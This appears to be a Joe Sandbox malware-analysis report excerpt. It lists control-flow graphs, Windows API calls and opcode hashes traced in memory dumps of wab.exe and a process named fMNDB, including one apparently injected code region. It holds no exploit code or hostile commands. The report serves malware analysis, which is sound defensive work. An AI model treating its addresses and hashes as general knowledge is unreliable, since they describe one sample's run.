                                      control_flow_graph 82 323fce0-323fd1c 83 323fd22-323fd27 82->83 84 323fdcc-323fdec 82->84 85 323fd7a-323fdb2 CallWindowProcW 83->85 86 323fd29-323fd60 83->86 90 323fdef-323fdfc 84->90 87 323fdb4-323fdba 85->87 88 323fdbb-323fdca 85->88 93 323fd62-323fd68 86->93 94 323fd69-323fd78 86->94 87->88 88->90 93->94 94->90
                                      APIs
                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 0323FDA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3741536370.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_3230000_wab.jbxd
                                      Similarity
                                      • API ID: CallProcWindow
                                      • String ID: T"
                                      • API String ID: 2714655100-2256068860
                                      • Opcode ID: 01d466bdd40fffd40fa9fe6b25c79a51f3b7f13fc1700b7cb217289661704c31
                                      • Instruction ID: abb2fe907628f08b229917e9e9aefd4aeb2a986b2874b580b156d98c2a14f8f3
                                      • Opcode Fuzzy Hash: 01d466bdd40fffd40fa9fe6b25c79a51f3b7f13fc1700b7cb217289661704c31
                                      • Instruction Fuzzy Hash: 294147B59103099FCB14CF99C588AAABBF5FB88310F24C498D519AB361D375A841CFA0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1608 3237250-3237256 1609 323727a-32372a2 1608->1609 1610 3237258-3237277 1608->1610 1612 32372a4-32372a7 1609->1612 1613 32372aa-32372d5 DeleteFileW 1609->1613 1610->1609 1612->1613 1614 32372d7-32372dd 1613->1614 1615 32372de-3237306 1613->1615 1614->1615
                                      APIs
                                      • DeleteFileW.KERNEL32(00000000), ref: 032372C8
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3741536370.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_3230000_wab.jbxd
                                      Similarity
                                      • API ID: DeleteFile
                                      • String ID:
                                      • API String ID: 4033686569-0
                                      • Opcode ID: 599be7152ba506173dbc63e84afe37a4bd227f1c4b94779d0f3e6c145afbcf41
                                      • Instruction ID: 50cae580a6e8f8597eba792ed86d4a25e6bb4356a838929cebee566d34f051e2
                                      • Opcode Fuzzy Hash: 599be7152ba506173dbc63e84afe37a4bd227f1c4b94779d0f3e6c145afbcf41
                                      • Instruction Fuzzy Hash: 4B219AB1C1464A9FCB20CFAAC4417DEFBB4EF4A310F15826AD858A7281D735A945CFA0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1618 3237258-32372a2 1621 32372a4-32372a7 1618->1621 1622 32372aa-32372d5 DeleteFileW 1618->1622 1621->1622 1623 32372d7-32372dd 1622->1623 1624 32372de-3237306 1622->1624 1623->1624
                                      APIs
                                      • DeleteFileW.KERNEL32(00000000), ref: 032372C8
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3741536370.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_3230000_wab.jbxd
                                      Similarity
                                      • API ID: DeleteFile
                                      • String ID:
                                      • API String ID: 4033686569-0
                                      • Opcode ID: 07579a8a5b2458e7a9aa7c19e70729840093babd055ad8ecfda49b9ab07a0086
                                      • Instruction ID: 4fe56d45c40c07b977823d47da06f339e66fcd8aa225cac735ca89a2dec94766
                                      • Opcode Fuzzy Hash: 07579a8a5b2458e7a9aa7c19e70729840093babd055ad8ecfda49b9ab07a0086
                                      • Instruction Fuzzy Hash: 101147B1C1065A9FCB10CF9AC545B9EFBF4EF48320F15822AE818A7240D738A945CFA5
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3740407258.000000000320D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0320D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_320d000_wab.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7d8c373d341395d343e5277d82f1fc3c5fd74dfa3c4ca31863a5434e87c52770
                                      • Instruction ID: 2188a6dfbbbd3d3e5298cfa3a6744d853042d70bb126b70c82b7b8d7f1be7871
                                      • Opcode Fuzzy Hash: 7d8c373d341395d343e5277d82f1fc3c5fd74dfa3c4ca31863a5434e87c52770
                                      • Instruction Fuzzy Hash: 4B2122B1615300DFDB14DF50DAC0B26BBA6EB84324F24C5ADD84D0B287C376D88BCA62
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3740407258.000000000320D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0320D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_320d000_wab.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cd61e1e5a435ee03088f117a57dc791403a504796551d0621e8b64bb0248a4cd
                                      • Instruction ID: 135cd6633d34fbe2cd15ff4ac85c743c5790ce2a7e3bc29f9a7f5dd4916de87b
                                      • Opcode Fuzzy Hash: cd61e1e5a435ee03088f117a57dc791403a504796551d0621e8b64bb0248a4cd
                                      • Instruction Fuzzy Hash: B211BE75504280CFCB15CF54D6C0B15FB62FB84314F28C6AAD8494B697C33AD44ACB62

                                      Execution Graph

                                      Execution Coverage:28.1%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:30.2%
                                      Total number of Nodes:215
                                      Total number of Limit Nodes:4
                                      execution_graph 883 1637c2 884 1637d3 883->884 887 162f51 ResolveDelayLoadedAPI 884->887 886 1637e0 887->886 873 1631d3 874 1631e7 _exit 873->874 875 1631ee 873->875 874->875 876 1631f7 _cexit 875->876 877 163202 875->877 876->877 646 163030 663 163675 646->663 648 163035 649 163046 GetStartupInfoW 648->649 650 163063 649->650 651 163078 650->651 652 16307f Sleep 650->652 653 163097 _amsg_exit 651->653 654 1630a1 651->654 652->650 653->654 655 1630e3 _initterm 654->655 656 1630c4 654->656 658 1630fe __IsNonwritableInCurrentImage 654->658 655->658 657 1631a6 _ismbblead 657->658 658->657 660 1631ee 658->660 661 16318e exit 658->661 668 161c5c 658->668 660->656 662 1631f7 _cexit 660->662 661->658 662->656 664 16369e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 663->664 665 16369a 663->665 667 1636ed 664->667 665->664 666 163702 665->666 666->648 667->666 731 1637f0 668->731 672 161d01 HeapSetInformation 673 161d20 672->673 706 161d18 672->706 735 1629ab CommandLineToArgvW 673->735 678 162560 682 16256b FreeLibrary 678->682 683 162578 678->683 679 16201a FreeLibrary 679->678 680 161e0e 749 161b83 memset 680->749 682->683 785 161ae4 683->785 686 161e22 GetLastError 686->706 687 161e2f 755 1625d3 memset memset CommandLineToArgvW 687->755 691 161ae4 2 API calls 692 16259a 691->692 789 1632b0 692->789 695 1625a9 695->658 696 161eee 697 161ef2 EventUnregister 696->697 699 161f1f memset LoadStringW MessageBoxW 697->699 700 161f6d 697->700 699->706 701 161f79 GetProcAddress 700->701 705 16202e 700->705 701->706 703 162036 GetProcAddress 703->706 708 16204e 703->708 705->703 707 16208a 705->707 706->678 706->679 707->706 709 16211c GetProcAddress 707->709 708->706 709->706 710 162136 709->710 711 16218c memset 710->711 715 162225 710->715 712 1621a9 LoadStringW 711->712 712->715 714 162384 716 16238d GetProcAddress 714->716 717 16242a 714->717 715->714 795 161b21 715->795 716->706 726 1623a5 716->726 719 162433 GetProcAddress 717->719 720 1624d0 717->720 719->706 727 16244b 719->727 721 1624d8 GetProcAddress 720->721 723 1624f0 720->723 721->706 721->723 722 162525 GetProcAddress 722->706 724 16253d 722->724 723->706 723->722 724->678 726->706 728 1623e2 memset LoadStringW 726->728 727->706 729 162488 memset LoadStringW 727->729 728->717 729->720 730 16233c memset LoadStringW 730->714 732 161c6b memset GetCommandLineW 731->732 733 161ab0 732->733 734 161acb 733->734 734->672 734->734 736 1629cc 735->736 737 161d27 735->737 738 1629db LocalFree 736->738 741 161bf4 737->741 738->737 739 1629ec 738->739 740 162a08 RegisterApplicationRestart 739->740 740->737 799 1628a4 memset 741->799 744 161c4d 747 1632b0 4 API calls 744->747 745 161c28 PathAppendW 745->744 746 161c3e LoadLibraryW 745->746 746->744 748 161c5a 6 API calls 747->748 748->680 748->706 750 1628a4 10 API calls 749->750 751 161bbb LoadLibraryW 750->751 753 1632b0 4 API calls 751->753 754 161bf2 753->754 754->686 754->687 756 162888 755->756 757 162661 755->757 759 1632b0 4 API calls 756->759 758 16287d LocalFree 757->758 760 162683 StrCmpNIW 757->760 766 162676 757->766 758->756 761 161e43 759->761 762 1626f0 760->762 767 1626a0 760->767 761->706 780 16193a EventRegister 761->780 763 162741 762->763 765 162709 PathFindExtensionW 762->765 764 162761 StrCmpIW 763->764 763->766 764->763 772 162785 764->772 768 16271e StrCmpIW 765->768 766->758 767->766 811 161b57 767->811 768->763 769 162730 768->769 769->766 769->768 771 1627c0 773 1627d3 GetFileAttributesW 771->773 772->766 772->771 774 1627e5 773->774 778 162833 773->778 775 162811 774->775 776 1627ee PathRemoveFileSpecW 774->776 775->766 776->775 777 1627ff GetFileAttributesW 776->777 777->775 777->778 778->775 815 162b60 778->815 781 16198b 780->781 782 161998 EventSetInformation 780->782 783 1632b0 4 API calls 781->783 782->781 784 1619c5 783->784 784->696 784->697 794 1619c7 EventWriteTransfer 784->794 786 161af2 785->786 787 161b16 786->787 788 161b06 GetProcessHeap HeapFree 786->788 787->691 788->787 790 1632bb 789->790 791 1632b8 789->791 829 1632c0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 790->829 791->695 793 1633f6 793->695 794->696 796 161b2e 795->796 797 161b4d 795->797 830 162c36 796->830 797->706 797->730 800 1628ee RegOpenKeyExW 799->800 801 16299d 799->801 802 162914 RegQueryValueExW 800->802 803 162989 800->803 804 1632b0 4 API calls 801->804 802->803 805 162949 802->805 803->801 806 162991 RegCloseKey 803->806 807 161c17 PathRemoveFileSpecW 804->807 808 16296d GetFileAttributesW 805->808 809 162958 ExpandEnvironmentStringsW 805->809 806->801 807->744 807->745 808->803 810 162979 808->810 809->803 810->803 812 161b63 811->812 812->812 813 162b60 6 API calls 812->813 814 161b7b 813->814 814->766 816 162bc7 815->816 817 162b74 815->817 816->775 817->816 821 162a7e 817->821 820 162baa memcpy 820->816 822 162a8e 821->822 823 162a95 821->823 822->816 822->820 823->822 824 162ac9 GetProcessHeap HeapAlloc 823->824 824->822 825 162adf 824->825 826 162ae5 memcpy 825->826 827 162aff 825->827 826->827 827->822 827->827 828 162b33 GetProcessHeap HeapFree 827->828 828->822 829->793 831 162c61 830->831 832 162ce8 830->832 835 162a7e 5 API calls 831->835 833 1632b0 4 API calls 832->833 834 162cf7 833->834 834->797 836 162c86 835->836 841 162cd4 836->841 842 162cfb 836->842 837 161ae4 2 API calls 837->832 841->837 843 162cae 842->843 844 162d0a 842->844 843->841 850 162bd5 843->850 844->843 856 162ef8 844->856 848 162d44 memset 848->843 849 162d4b memset 849->843 851 162c28 850->851 852 162be5 850->852 851->841 852->851 853 162a7e 5 API calls 852->853 854 162c0b 853->854 854->851 855 162c11 memcpy 854->855 855->851 857 162f07 856->857 859 162d2b 857->859 860 162e3f 857->860 859->848 859->849 861 162e83 860->861 862 162e8f 861->862 863 162e9f LocalAlloc 861->863 862->859 863->862 864 162eaf 863->864 865 162ee8 LocalFree 864->865 868 162deb 864->868 865->862 867 162eda 867->865 869 162e1c 868->869 870 162df8 868->870 869->867 870->869 871 162e06 IsDBCSLeadByte 870->871 871->869 871->870 872 163450 SetUnhandledExceptionFilter 878 163790 _except_handler4_common 879 1625b0 880 1625c5 PostQuitMessage 879->880 881 1625be DefWindowProcW 879->881 881->880 888 162f80 889 162f85 888->889 897 1634d8 GetModuleHandleW 889->897 891 162f91 __set_app_type __p__fmode __p__commode 892 162fc9 891->892 893 162fd2 __setusermatherr 892->893 894 162fde 892->894 893->894 899 16370d _controlfp 894->899 896 162fe3 898 1634e9 897->898 898->891 899->896 900 163400 901 16343d 900->901 903 163412 900->903 902 163437 ?terminate@ 902->901 903->901 903->902 882 1631bf _XcptFilter

                                      Callgraph

                                      • Executed
                                      • Not Executed
                                      • Opacity -> Relevance
                                      • Disassembly available
                                      callgraph 0 Function_00163790 1 Function_0016361E 2 Function_00163219 3 Function_00161B83 16 Function_001632B0 3->16 23 Function_001628A4 3->23 4 Function_00162F80 9 Function_0016370D 4->9 24 Function_00163520 4->24 36 Function_001634D8 4->36 41 Function_0016324A 4->41 5 Function_00161B80 6 Function_00163400 7 Function_00163580 15 Function_00163530 7->15 39 Function_00163640 7->39 8 Function_00163001 10 Function_0016360B 11 Function_00162C36 11->16 17 Function_00161AB0 11->17 30 Function_00162BD5 11->30 45 Function_00162A7E 11->45 47 Function_00162CFB 11->47 50 Function_00161AE4 11->50 12 Function_001634B5 13 Function_001625B0 14 Function_001618B0 40 Function_001632C0 16->40 18 Function_00163030 18->2 18->7 28 Function_00163728 18->28 35 Function_00161C5C 18->35 43 Function_00163675 18->43 19 Function_001634B1 20 Function_001631BF 21 Function_00162E3F 46 Function_00162D7F 21->46 55 Function_00162DEB 21->55 22 Function_0016193A 22->16 23->16 53 Function_00161A60 23->53 25 Function_00162A21 26 Function_00161B21 26->11 27 Function_001629AB 27->25 29 Function_00161B57 52 Function_00162B60 29->52 30->45 31 Function_001625D3 31->16 31->29 31->52 31->53 32 Function_001631D3 33 Function_00163450 34 Function_00162F51 35->3 35->16 35->17 35->22 35->26 35->27 35->31 37 Function_001619C7 35->37 42 Function_00161BF4 35->42 44 Function_001637F0 35->44 35->50 51 Function_00163464 36->51 38 Function_001637C2 38->34 42->16 42->23 48 Function_00162EF8 47->48 48->21 49 Function_001613F8 51->28 52->45 54 Function_0016376D

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 161c5c-161d16 call 1637f0 memset GetCommandLineW call 161ab0 HeapSetInformation 5 161d20-161e08 call 1629ab call 161bf4 LoadStringW LoadIconW LoadCursorW GetStockObject RegisterClassW CreateWindowExW 0->5 6 161d18-161d1b 0->6 7 161faf 5->7 19 161e0e-161e20 call 161b83 5->19 6->7 10 161fb1-161fb9 7->10 12 161fde-161fe6 10->12 13 161fbb-161fd5 10->13 14 16200d-162014 12->14 15 161fe8-162004 12->15 13->12 32 161fd7-161fdc 13->32 17 162560 14->17 18 16201a-162029 FreeLibrary 14->18 15->14 33 162006-16200b 15->33 22 162562-162569 17->22 18->22 30 161e22 GetLastError 19->30 31 161e2f-161e45 call 1625d3 19->31 24 16256b-162572 FreeLibrary 22->24 25 162578-1625aa call 161ae4 * 2 call 1632b0 22->25 24->25 35 161e28-161e2a 30->35 31->7 39 161e4b-161e62 call 16193a 31->39 32->12 33->14 35->7 45 161ef0 39->45 46 161e68-161e76 39->46 47 161ef2-161f1d EventUnregister 45->47 46->47 48 161e78-161e88 46->48 50 161f1f-161f62 memset LoadStringW MessageBoxW 47->50 51 161f6d-161f73 47->51 48->47 49 161e8a-161e8c 48->49 49->47 52 161e8e-161eee call 1619c7 49->52 53 161f68-161f6b 50->53 54 16202e-162034 51->54 55 161f79-161f8b GetProcAddress 51->55 52->47 53->10 59 162036 54->59 60 16206a-162070 54->60 56 161fac-161fae 55->56 57 161f8d-161f95 55->57 56->7 71 161f99-161f9b 57->71 64 162038-162048 GetProcAddress 59->64 61 162076-16207c 60->61 62 162072-162074 60->62 66 162082-162084 61->66 67 16207e-162080 61->67 62->64 64->56 68 16204e-16205c 64->68 69 162086-162088 66->69 70 16208a-162098 66->70 67->64 87 162065 68->87 88 16205e-162063 68->88 69->64 72 1620b3-1620b9 70->72 73 16209a-1620a1 70->73 75 161fa4-161fa6 71->75 76 161f9d-161fa2 71->76 79 1620d4-1620da 72->79 80 1620bb-1620c2 72->80 77 1620a3-1620a9 73->77 78 1620ab-1620b1 73->78 75->35 75->56 76->75 84 16210f-162116 77->84 78->84 82 1620f5-1620fd 79->82 83 1620dc-1620e3 79->83 85 1620c4-1620ca 80->85 86 1620cc-1620d2 80->86 82->84 91 1620ff-162109 82->91 89 1620e5-1620eb 83->89 90 1620ed-1620f3 83->90 84->53 92 16211c-162130 GetProcAddress 84->92 85->84 86->84 87->56 88->87 89->84 90->84 91->84 92->53 93 162136-162179 92->93 96 162182-162186 93->96 97 16217b-162180 93->97 98 162225-162228 96->98 99 16218c-1621a7 memset 96->99 97->96 102 162251-162254 98->102 103 16222a-162247 98->103 100 1621ec 99->100 101 1621a9-1621af 99->101 108 1621f1-16221a LoadStringW 100->108 104 1621e5-1621ea 101->104 105 1621b1-1621b7 101->105 106 162256-16227f 102->106 107 162281-162284 102->107 121 16224a 103->121 104->108 109 1621de-1621e3 105->109 110 1621b9-1621bf 105->110 106->121 111 162286-162291 107->111 112 1622c7-1622ca 107->112 108->98 109->108 116 1621d7-1621dc 110->116 117 1621c1-1621d5 110->117 119 162293 111->119 120 162299-1622c5 111->120 114 162384-162387 112->114 115 1622d0-1622e4 call 161b21 112->115 122 16238d-16239f GetProcAddress 114->122 123 16242a-16242d 114->123 115->53 131 1622ea-1622f5 115->131 116->108 117->108 119->120 120->121 121->102 122->56 125 1623a5-1623c6 122->125 128 162433-162445 GetProcAddress 123->128 129 1624d0-1624d6 123->129 148 1623cf-1623d1 125->148 149 1623c8-1623cd 125->149 128->56 134 16244b-16246c 128->134 132 1624d8-1624ea GetProcAddress 129->132 133 162519-16251f 129->133 137 1622f7 131->137 138 1622fd-162320 131->138 132->56 139 1624f0-162514 132->139 133->53 135 162525-162537 GetProcAddress 133->135 150 162475-162477 134->150 151 16246e-162473 134->151 135->56 142 16253d-16255b 135->142 137->138 158 162322-162327 138->158 159 162329-16232b 138->159 139->133 142->17 148->56 152 1623d7-1623dc 148->152 149->148 150->56 155 16247d-162482 150->155 151->150 152->56 157 1623e2-16241f memset LoadStringW 152->157 155->56 160 162488-1624c5 memset LoadStringW 155->160 157->123 158->159 159->56 161 162331-162336 159->161 160->129 161->56 162 16233c-162379 memset LoadStringW 161->162 162->114
                                      APIs
                                      • memset.MSVCRT ref: 00161CC6
                                      • GetCommandLineW.KERNEL32 ref: 00161CCE
                                      • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?), ref: 00161D0E
                                      • LoadStringW.USER32(00000000,000007D1,?,00000104), ref: 00161D49
                                      • LoadIconW.USER32 ref: 00161D84
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00161D96
                                      • GetStockObject.GDI32(00000000), ref: 00161DA3
                                      • RegisterClassW.USER32(00000003), ref: 00161DCD
                                      • CreateWindowExW.USER32(00000000,Contacts Viewer,?,00CF0000,00000000,00000000,0000012C,000000C8,00000000,00000000,00000000), ref: 00161DF8
                                      • GetLastError.KERNEL32 ref: 00161E22
                                      • FreeLibrary.KERNELBASE(?), ref: 0016201B
                                      • FreeLibrary.KERNELBASE(?), ref: 0016256C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.3036661191.0000000000161000.00000020.00000001.01000000.00000009.sdmp, Offset: 00160000, based on PE: true
                                      • Associated: 00000018.00000002.3036594445.0000000000160000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000165000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000167000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.000000000017D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_160000_fMNDB.jbxd
                                      Similarity
                                      • API ID: Load$FreeLibrary$ClassCommandCreateCursorErrorHeapIconInformationLastLineObjectRegisterStockStringWindowmemset
                                      • String ID: $API Entered$Contacts Viewer$WABOpen
                                      • API String ID: 328653217-1327836325
                                      • Opcode ID: 564052ad6aa2725908f6fc5391998035ecc8f9c493b0a04e774c71d95735024d
                                      • Instruction ID: 915aac33bd36b4d8cfc7b02abd4b53418a8867e93fbcd883cd0ea6595354e7af
                                      • Opcode Fuzzy Hash: 564052ad6aa2725908f6fc5391998035ecc8f9c493b0a04e774c71d95735024d
                                      • Instruction Fuzzy Hash: 1332C575900628AFDB258F54DC95BEA77BAFF44300F1841E9F909A72A0DB749E90CF90

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 256 163450-16345d SetUnhandledExceptionFilter
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00003400), ref: 00163455
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.3036661191.0000000000161000.00000020.00000001.01000000.00000009.sdmp, Offset: 00160000, based on PE: true
                                      • Associated: 00000018.00000002.3036594445.0000000000160000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000165000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000167000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.000000000017D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_160000_fMNDB.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 3c13d1383a74e2a49b49b2f8a35725ea6666c5dfd5c52b16bea8b17f5b23601c
                                      • Instruction ID: 47dd139f69ef8327d929a1a1bce0d4d7c0f082833334a9e01f30a4f507fdb649
                                      • Opcode Fuzzy Hash: 3c13d1383a74e2a49b49b2f8a35725ea6666c5dfd5c52b16bea8b17f5b23601c
                                      • Instruction Fuzzy Hash: B79002603595004687011B705C1E505A9A16B4870BB821450F015C5458DF9081519551

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 163 163030-163061 call 163675 call 163728 GetStartupInfoW 169 163063-163072 163->169 170 163074-163076 169->170 171 16308c-16308e 169->171 172 16307f-16308a Sleep 170->172 173 163078-16307d 170->173 174 16308f-163095 171->174 172->169 173->174 175 163097-16309f _amsg_exit 174->175 176 1630a1-1630a7 174->176 177 1630db-1630e1 175->177 178 1630d5 176->178 179 1630a9-1630b9 call 163219 176->179 180 1630e3-1630f4 _initterm 177->180 181 1630fe-163100 177->181 178->177 183 1630be-1630c2 179->183 180->181 184 163102-163109 181->184 185 16310b-163112 181->185 183->177 186 1630c4-1630d0 183->186 184->185 187 163137-163141 185->187 188 163114-163121 call 163580 185->188 190 163209-163218 186->190 189 163144-163149 187->189 188->187 197 163123-163135 188->197 192 163195-163198 189->192 193 16314b-16314d 189->193 198 1631a6-1631b3 _ismbblead 192->198 199 16319a-1631a3 192->199 195 163164-163168 193->195 196 16314f-163151 193->196 203 163170-163172 195->203 204 16316a-16316e 195->204 196->192 202 163153-163155 196->202 197->187 200 1631b5-1631b6 198->200 201 1631b9-1631bd 198->201 199->198 200->201 201->189 202->195 205 163157-16315a 202->205 206 163173-16318c call 161c5c 203->206 204->206 205->195 208 16315c-163162 205->208 211 1631ee-1631f5 206->211 212 16318e-16318f exit 206->212 208->202 213 1631f7-1631fd _cexit 211->213 214 163202 211->214 212->192 213->214 214->190
                                      APIs
                                        • Part of subcall function 00163675: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 001636A2
                                        • Part of subcall function 00163675: GetCurrentProcessId.KERNEL32 ref: 001636B1
                                        • Part of subcall function 00163675: GetCurrentThreadId.KERNEL32 ref: 001636BA
                                        • Part of subcall function 00163675: GetTickCount.KERNEL32 ref: 001636C3
                                        • Part of subcall function 00163675: QueryPerformanceCounter.KERNEL32(?), ref: 001636D8
                                      • GetStartupInfoW.KERNEL32(?,00163838,00000058), ref: 0016304F
                                      • Sleep.KERNEL32(000003E8), ref: 00163084
                                      • _amsg_exit.MSVCRT ref: 00163099
                                      • _initterm.MSVCRT ref: 001630ED
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00163119
                                      • exit.KERNELBASE ref: 0016318F
                                      • _ismbblead.MSVCRT ref: 001631AA
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.3036661191.0000000000161000.00000020.00000001.01000000.00000009.sdmp, Offset: 00160000, based on PE: true
                                      • Associated: 00000018.00000002.3036594445.0000000000160000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000165000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000167000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.000000000017D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_160000_fMNDB.jbxd
                                      Similarity
                                      • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                      • String ID:
                                      • API String ID: 836923961-0
                                      • Opcode ID: 17b749af5ae120ed6da0c684cd56904a27ebee2280238691140b52cdfbe61021
                                      • Instruction ID: af7a34490cb44323a03d8c6a12a043d5ce898336292378e15e4dd79c18ed1e33
                                      • Opcode Fuzzy Hash: 17b749af5ae120ed6da0c684cd56904a27ebee2280238691140b52cdfbe61021
                                      • Instruction Fuzzy Hash: 84412631904325DFDB259F68DC1536ABBF5FB16721F21001AF922A7790CBB08AA4CB90

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 215 1628a4-1628e8 memset 216 1628ee-162912 RegOpenKeyExW 215->216 217 16299d-1629aa call 1632b0 215->217 218 162914-162947 RegQueryValueExW 216->218 219 162989-16298f 216->219 218->219 221 162949-162956 218->221 219->217 222 162991-162997 RegCloseKey 219->222 224 16296d-162977 GetFileAttributesW 221->224 225 162958-16296b ExpandEnvironmentStringsW 221->225 222->217 224->219 226 162979-162984 call 161a60 224->226 225->219 226->219
                                      APIs
                                      • memset.MSVCRT ref: 001628DE
                                      • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 0016290A
                                      • RegQueryValueExW.KERNELBASE(?,001611FC,00000000,?,?,?,?,00000000,00000000), ref: 0016293F
                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 0016295F
                                      • GetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 0016296E
                                      • RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 00162997
                                      Strings
                                      • Software\Microsoft\WAB\DLLPath, xrefs: 00162900
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.3036661191.0000000000161000.00000020.00000001.01000000.00000009.sdmp, Offset: 00160000, based on PE: true
                                      • Associated: 00000018.00000002.3036594445.0000000000160000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000165000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.0000000000167000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000018.00000002.3036687384.000000000017D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_160000_fMNDB.jbxd
                                      Similarity
                                      • API ID: AttributesCloseEnvironmentExpandFileOpenQueryStringsValuememset
                                      • String ID: Software\Microsoft\WAB\DLLPath
                                      • API String ID: 2763597636-3156921957
                                      • Opcode ID: f2d02d42a8a5f76caee7306712de2861b7b2021f0eade02e43fc26e32506414d
                                      • Instruction ID: 3aa4b5e3e1afe2d19565f6a2eaa4d890e551c3a5e52b32a4c0444f1c3932c85d
                                      • Opcode Fuzzy Hash: f2d02d42a8a5f76caee7306712de2861b7b2021f0eade02e43fc26e32506414d
                                      • Instruction Fuzzy Hash: D321627194162DABDB309F54CD8CEDAB7BCAFA4714F14069AF419E2150D7B08B94CEA0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 228 161bf4-161c26 call 1628a4 PathRemoveFileSpecW 231 161c4d-161c5b call 1632b0 228->231 232 161c28-161c3c PathAppendW 228->232 232->231 233 161c3e-161c4b LoadLibraryW 232->233 233->231
                                      APIs
                                        • Part of subcall function 001628A4: memset.MSVCRT ref: 001628DE
                                        • Part of subcall function 001628A4: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\WAB\DLLPath,00000000,00020019,?,?,00000000,00000000), ref: 0016290A
                                        • Part of subcall function 001628A4: RegQueryValueExW.KERNELBASE(?,001611FC,00000000,?,?,?,?,00000000,00000000), ref: 0016293F
                                        • Part of subcall function 001628A4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000,00000000), ref: 0016295F
                                        • Part of subcall function 001628A4: RegCloseKey.KERNELBASE(?,?,00000000,00000000), ref: 00162997
                                      • PathRemoveFileSpecW.SHLWAPI(?,?), ref: 00161C1E
                                      • PathAppendW.SHLWAPI(?,wab32res.dll), ref: 00161C34
                                      • LoadLibraryW.KERNELBASE(?), ref: 00161C45
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.3036661191.0000000000161000.00000020.00000001.01000000.00000009.sdmp, Offset: 00160000, based on PE: true
                                      • Associated: 00000018.00000002.3036594445.0000000000160000.00000002.00000001.01000000.00000009.sdmpDownload File
